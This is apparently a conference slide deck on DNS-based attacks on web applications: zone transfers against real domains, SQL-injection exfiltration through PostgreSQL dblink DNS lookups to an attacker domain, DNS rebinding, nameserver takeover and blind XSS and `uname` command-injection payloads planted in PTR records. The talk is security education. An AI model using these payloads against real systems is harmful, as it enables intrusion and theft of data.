4Developers: Dns vs webapp

$ whoami
•  Specjalista ds. Bezpieczeństwa Systemów IT
•  Security Researcher
•  Bug Hunter

DNS
$ host -t ns .
. name server l.root-servers.net.
. name server f.root-servers.net.
. name server g.root-servers.net.
. name server d.root-servers.net.
. name server j.root-servers.net.
. name server a.root-servers.net.
. name server k.root-servers.net.
. name server m.root-servers.net.
. name server c.root-servers.net.
. name server e.root-servers.net.
. name server b.root-servers.net.
. name server h.root-servers.net.
. name server i.root-servers.net.

DNS $ host -t ns pl.
pl name server a-dns.pl.
pl name server c-dns.pl.
pl name server d-dns.pl.
pl name server e-dns.pl.
pl name server f-dns.pl.
pl name server g-dns.pl.
pl name server h-dns.pl.
pl name server i-dns.pl.

DNS
$ host -t ns wp.pl
wp.pl name server ns2.wp.pl.
wp.pl name server ns1.wp.pl.
wp.pl name server ns1.task.gda.pl.

DNS
$ host -t ns poczta.wp.pl
poczta.wp.pl has no NS record
$ host -t A poczta.wp.pl
poczta.wp.pl has address 212.77.101.148

Typy rekordów
localhost IN A 127.0.0.1
ipv6 IN AAAA 2001:6d8:10:1667::6667
wow IN NS ns1.evil.com.
go IN CNAME google.com.
ala IN TXT "ala ma kota"
1 IN PTR 8.8.8.8
@ IN MX 10 smtp.evil.com.
* IN A 142.62.4.13

Information Disclosure
•  svn.evil.com
•  git.evil.com
•  mysql.evil.com
•  www2.evil.com
•  test.evil.com
•  beta.evil.com
•  dev.evil.com
•  vpn.evil.com

Information Disclosure
•  svn.evil.com
•  git.evil.com
•  mysql.evil.com
•  www2.evil.com
•  test.evil.com
•  beta.evil.com
•  dev.evil.com
•  vpn.evil.com
•  (…)
$ host orange.pl
orange.pl has address 80.48.169.1
orange.pl mail is handled by 5 mx5.orange.pl.
orange.pl mail is handled by 0 mx.orange.pl.
$ host 80.48.169.1
1.169.48.80.in-addr.arpa domain name pointer www2.orange.pl.
$ host 80.48.169.2
2.169.48.80.in-addr.arpa domain name pointer mobile2.orange.pl.
$ host 80.48.169.3
3.169.48.80.in-addr.arpa domain name pointer xwi2.orange.pl.
(…)

Tools
•  https://github.com/TheRook/subbrute
•  https://github.com/aboul3la/Sublist3r
•  http://www.yougetsignal.com/
•  http://bgp.he.net/

$ dig @fns2.42.pl televoice.pl axfr
; <<>> DiG 9.7.3 <<>> @fns2.42.pl televoice.pl axfr
; (2 servers found)
;; global options: +cmd
televoice.pl. 86400 IN SOA fns1.42.pl. dns.sotiko.pl.
1361872990 10800 3600 604800 10800
televoice.pl. 86400 IN A 91.199.22.117
www.admin.televoice.pl. 86400 IN A 91.199.22.117
dokumenty.televoice.pl. 86400 IN CNAME ghs.google.com.
ftp.televoice.pl. 86400 IN A 91.199.22.117
kalendarz.televoice.pl. 86400 IN CNAME ghs.google.com.
old.televoice.pl. 86400 IN A 91.199.22.117
poczta.televoice.pl. 86400 IN A 91.199.22.117
sip.televoice.pl. 86400 IN A 195.162.16.201
sklep.televoice.pl. 86400 IN A 91.199.22.117
www.sklep.televoice.pl. 86400 IN A 91.199.22.117
www.sklep2.televoice.pl. 86400 IN A 91.199.22.117
sql.televoice.pl. 86400 IN A 91.199.22.117
sql2.televoice.pl. 86400 IN A 91.199.22.117
start.televoice.pl. 86400 IN CNAME ghs.google.com.

Zone Transfer
$ ./zone.pl gov.sl
Checking ns1.neoip.com... failed.
Checking ns2.neoip.com... OK!
gov.sl. 21600 IN SOA ns1.neoip.com. 1408140001. (
10800 ;serial
3600 ;refresh
604800 ;retry
21600 ;expire
3600 ) ;minimum
gov.sl. 21600 IN NS ns2.neoip.com.
gov.sl. 21600 IN NS ns1.neoip.com.
statehouse.gov.sl. 21600 IN NS ns1.egovhosting.com.
statehouse.gov.sl. 21600 IN NS ns2.egovhosting.com.
tsl.gov.sl. 21600 IN NS NS 1.EHOSTING.COM.
pharmacyboard.gov.sl. 21600 IN NS ns53.domaincontrol.com.
pharmacyboard.gov.sl. 21600 IN NS ns54.domaincontrol.com.
mof.gov.sl. 21600 IN NS ns1.ixwebhosting.com.
mof.gov.sl. 21600 IN NS ns2.ixwebhosting.com.
mofa.gov.sl. 21600 IN NS ns1.abac.com.

Zone Transfer
bi. 86400 IN SOA ns.nic.bi. registry.nic.bi. (
2014082629 ;serial
21600 ;refresh
3600 ;retry
604800 ;expire
86400 ) ;minimum
bi. 86400 IN TXT "Generation Time: 1409056444"
bi. 86400 IN NS bi.cctld.authdns.ripe.net.
bi. 86400 IN NS ns.nic.bi.
bi. 86400 IN NS dns.princeton.edu.
bi. 86400 IN NS ns1.nic.bi.
bi. 86400 IN NS anyns.nic.bi.
bi. 86400 IN NS ns-bi.afrinic.net.
100.bi. 86400 IN NS ns11.xincache.com.
100.bi. 86400 IN NS ns12.xincache.com.
101domain.bi. 86400 IN NS ns1.101domain.com.
101domains.bi. 86400 IN NS ns1.101domain.com.

Zone Transfer
an ao arpa bb bd bf bi bs bv capetown
ci cv cw cy do durban eg er gp gq
gt gy kh int joburg ke kg kw mg mo
mp mw ni np pe pf pg py sc sj
sl sv tel to zw
-  ripe.net
-  gnu.org
-  poznan.pl

Data Exfiltration
•  Error Based SQL Injection

Data Exfiltration
•  Blind SQL Injection

Data Exfiltration
•  Time-Based SQL Injection

Data Exfiltration
•  Time-Based SQL Injection
•  Data Exfiltration

Data Exfiltration
$ cat /etc/bind/named.conf
(…)
logging{
channel example_log {
file "/var/log/dns.log" versions 3 size 2m;
severity info;
print-severity yes;
print-time yes;
print-category yes;
};
category "queries" {
example_log;
};
};

Data Exfiltration
$ host onet.pl localhost
Using domain server:
Name: localhost
Address: 127.0.0.1#53
Aliases:
onet.pl has address 213.180.141.140
onet.pl mail is handled by 1 mx.poczta.onet.pl.
$ tail -n 3 /var/log/dns.log
15-Aug-2014 16:35:57.533 queries: info: client 127.0.0.1#46730: query: onet.pl IN A +
(127.0.0.1)
15-Aug-2014 16:35:57.533 queries: info: client 127.0.0.1#33283: query: onet.pl IN
AAAA + (127.0.0.1)
15-Aug-2014 16:35:57.534 queries: info: client 127.0.0.1#41577: query: onet.pl IN MX
+ (127.0.0.1)

Data Exfiltration
INSERT (…) VALUES ('123'); è 123
INSERT (…) VALUES ('x'||user||'x'); è xtestx
INSERT (…) VALUES ('x'||(SELECT 123)||'x'); è x123x

Data Exfiltration
INSERT (…) VALUES ('123'); è 123
INSERT (…) VALUES ('x'||user||'x'); è xtestx
INSERT (…) VALUES ('x'||(SELECT 123)||'x'); è x123x
INSERT (…) VALUES (
'x'||(SELECT dblink_connect('host=pwnd.uid0.pl
user=1 password=2')) ||'x'
);
DNS Request

Data Exfiltration
'x'||(SELECT dblink_connect('host='||(SELECT
current_database())||'.uid0.pl user=1 password=2'))
||'x'
);
DNS Request

Data Exfiltration
'x'||(SELECT dblink_connect('host='||(SELECT
current_database())||'.uid0.pl user=1 password=2'))
||'x'
);
DNS Request
$ tail -n 1 /var/log/dns.log
26-Aug-2014 13:08:22.668 queries: info: client
173.194.90.82#38036: query: postgres.uid0.pl IN AAAA -
ED (80.86.91.39)

DNS Rebinding
$ cat .htaccess
<Files btc.txt>
Order deny,allow
Deny from all
Allow from 127.0.0.1
</Files>

DNS Rebinding Request nr 1
Request nr 2

DNS Rebinding Request nr 1
Request nr 2
$ for a in `seq 1 10`; do host rebind.uid0.pl ; done
rebind.uid0.pl has address 127.0.0.1

Domain Takeover
$ host -t ns getclouder.com
getclouder.com name server cumulus.getclouder.com.
getclouder.com name server nimbus.getclouder.com.

Domain Takeover
$ host -t ns clouder.us
clouder.us name server ns2.clev1.net.
clouder.us name server ns1.clev1.net.

Domain Takeover
ns1.clev1.net has address 181.224.128.6

Domain Takeover
nimbus.getclouder.com has address 181.224.128.6
cumulus.getclouder.com has address 198.20.77.76

$ host wow.ns1.clev1.net
wow.ns1.clev1.net has address 1.2.3.4

$ dig +trace ns1.clev1.net
(…)
clev1.net. 172800 IN NS ns1.clev1.net.
clev1.net. 172800 IN NS ns2.clev1.net.
;; Received 95 bytes from 192.55.83.30#53(192.55.83.30) in 167 ms
ns1.clev1.net. 86400 IN A 8.8.4.4
ns1.clev1.net. 86400 IN A 8.8.8.8
ns1.clev1.net. 86400 IN NS cumulus.getclouder.com.
ns1.clev1.net. 86400 IN NS nimbus.getclouder.com.
;; Received 152 bytes from 181.224.128.6#53(181.224.128.6) in 174 ms

[16:28:52] 181.224.128.4: proxying the response of type 'A' for ns2.siteground305.com
[16:29:01] 181.224.128.4: proxying the response of type 'MX' for artiste.com.mt
[16:29:06] 181.224.128.5: proxying the response of type 'A' for ns2.openprovider.be
[16:29:06] 181.224.128.5: proxying the response of type 'A' for ns3.openprovider.eu
[16:29:06] 181.224.128.5: proxying the response of type 'A' for ns1.openprovider.nl
[16:29:07] 181.224.128.4: proxying the response of type 'A' for ns2.transip.eu
[16:29:09] 181.224.128.4: proxying the response of type 'MX' for artiste.com.mt
[16:29:25] 181.224.128.4: proxying the response of type 'A' for ns1.betristofan.dk
[16:29:25] 181.224.128.4: proxying the response of type 'A' for ns2.betristofan.dk
[16:29:28] 181.224.128.4: proxying the response of type 'MX' for ablecomputing.com.fj
[16:29:43] 181.224.128.5: proxying the response of type 'A' for shades02.rzone.de
[16:29:43] 181.224.128.5: proxying the response of type 'A' for docks20.rzone.de
[16:29:44] 181.224.128.5: proxying the response of type 'A' for smtp.rzone.de

Blind XSS
f<img/src=http://attacker.com/xss.gif>

Blind XSS
XSS Executed

Blind XSS
XSS Executed
Apache access_log

Blind XSS
$ host 77.254.88.134
134.88.254.77.in-addr.arpa domain name pointer
77-254-88-134.adsl.inetia.pl.

Blind XSS
84.85.86.87
87. 87.86.85.84.in-addr.arpa

Blind XSS
$ host -t ns 88.254.77.in-addr.arpa
88.254.77.in-addr.arpa name server rumba.inetia.pl.
88.254.77.in-addr.arpa name server chacha.inetia.pl.

Blind XSS
zone "192/26.122.204.87.in-addr.arpa." IN {
type master;
allow-transfer { 109.173.165.151; };
check-names ignore;
file "/etc/bind/87.204.122.210";
};

Blind XSS
$TTL 3600
@ IN SOA ns1.ropchain.org. admin.ropchain.org. (
2014011417 ;serial
14400 ;refresh
3600 ;retry
604800 ;expire
10800 ;minimum
)
@ IN NS ns1.ropchain.org.
@ IN NS ns2.ropchain.org.
1 IN PTR ropchain.org.
210 IN PTR f"><img/src=http://monitor.ropchain.org/xss.gif>f.x.uid0.pl.
211 IN PTR a`uname`a.x.uid0.pl.
212 IN PTR ropchain.org.

Blind XSS
$ host 87.204.122.210
210.122.204.87.in-addr.arpa is an alias for 210.192/26.122.204.87.in-addr.arpa.
210.192/26.122.204.87.in-addr.arpa domain name pointer f"><img/src=http://
monitor.ropchain.org/xss.gif>f.x.uid0.pl.

Pytania?
Jakub Żoczek
jakub.zoczek@allegrogroup.com
zoczus@gmail.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://twitter.com/zoczus
http://hackerone.com/zoczus
http://zoczus.blogspot.com
http://ropchain.org

4Developers: Dns vs webapp

More Related Content

What's hot

Similar to 4Developers: Dns vs webapp

Recently uploaded

4Developers: Dns vs webapp